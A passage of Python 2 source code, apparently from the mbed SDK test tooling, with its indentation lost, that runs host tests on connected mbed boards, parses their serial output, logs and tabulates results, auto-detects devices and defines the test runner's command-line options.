reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # TIme of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
elif test[col] == None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress / 2) # Scale by to (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
print
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_text_file_name:
# Export results in form of a text file
report_exporter = ReportExporter(ResultExporterType.TEXT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as html report to sparate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter:
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with test specification')
parser.add_argument('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_argument("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type=int,
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_argument('--auto',
dest='auto_detect',
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
parser.add_argument('--tc',
dest='toolchains_filter',
type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_argument('--oper',
dest='operability_checks',
type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_argument('--clean',
dest='clean',
action="store_true",
help='Clean the build directory')
parser.add_argument('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_argument('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip perpherials tests and perform common tests')
parser.add_argument('-n', '--test-by-names',
dest='test_by_names',
type=argparse_many(str),
help='Runs only test enumerated it this switch. Use comma to separate test case names')
parser.add_argument('-p', '--peripheral-by-names',
dest='peripheral_by_names',
type=argparse_many(str),
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_argument('-c', '--copy-method',
dest='copy_method',
type=argparse_uppercase_type(copy_methods, "flash method"),
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_argument('-r', '--reset-type',
dest='mut_reset_type',
default=None,
type=argparse_uppercase_type(reset_methods, "reset method"),
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_argument('-g', '--goanna-for-tests',
dest='goanna_for_tests',
action="store_true",
help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
parser.add_argument('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
action="store_true",
help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
parser.add_argument('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of wellformatted table with test results')
parser.add_argument('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays wellformatted table with test x toolchain test result per target')
parser.add_argument('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_argument('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_argument("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_argument("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_argument('--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
parser.add_argument('--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configration and exits')
parser.add_argument('--loops',
dest='test_loops_list',
type=argparse_many(str),
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_argument('--global-loops',
dest='test_global_loops_value',
type=int,
help='Set global number of test loops per test. Default value is set 1')
parser.add_argument('--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_argument('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
parser.add_argument('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
parser.add_argument('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_argument('--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_argument('-f', '--filter',
dest='general_filter_regex',
type=argparse_many(str),
default=None,
help='For some commands you can use filter to filter out results')
parser.add_argument('--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type=int,
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_argument('--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_argument('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_argument('--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_argument('--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_argument("--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_argument("--report-text",
dest="report_text_file_name",
help="Output the build results to a text file")
parser.add_argument('--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_argument('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_argument('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_argument('--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
def test_path_to_name(path):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overriden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(path)
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def find_tests(base_dir, target_name, toolchain_name, options=None):
""" Finds all tests in a directory recursively
base_dir: path to the directory to scan for tests (ex. 'path/to/project')
target_name: name of the target to use for scanning (ex. 'K64F')
toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
options: Compile options to pass to the toolchain (ex. ['debug-info'])
"""
tests = {}
# Prepare the toolchain
toolchain = prepare_toolchain(base_dir, target_name, toolchain_name, options=options, silent=True)
# Scan the directory for paths to probe for 'TESTS' folders
base_resources = scan_resources(base_dir, toolchain)
dirs = base_resources.inc_dirs
for directory in dirs:
subdirs = os.listdir(directory)
# If the directory contains a subdirectory called 'TESTS', scan it for test cases
if 'TESTS' in subdirs:
walk_base_dir = join(directory, 'TESTS')
test_resources = toolchain.scan_resources(walk_base_dir, base_path=base_dir)
# Loop through all subdirectories
for d in test_resources.inc_dirs:
# If the test case folder is not called 'host_tests' and it is
# located two folders down from the main 'TESTS' folder (ex. TESTS/testgroup/testcase)
# then add it to the tests
path_depth = get_path_depth(relpath(d, walk_base_dir))
if path_depth == 2:
test_group_directory_path, test_case_directory = os.path.split(d)
test_group_directory = os.path.basename(test_group_directory_path)
# Check to make sure discoverd folder is not in a host test directory
if test_case_directory != 'host_tests' and test_group_directory != 'host_tests':
test_name = test_path_to_name(d)
tests[test_name] = d
return tests
def print_tests(tests, format="list", sort=True):
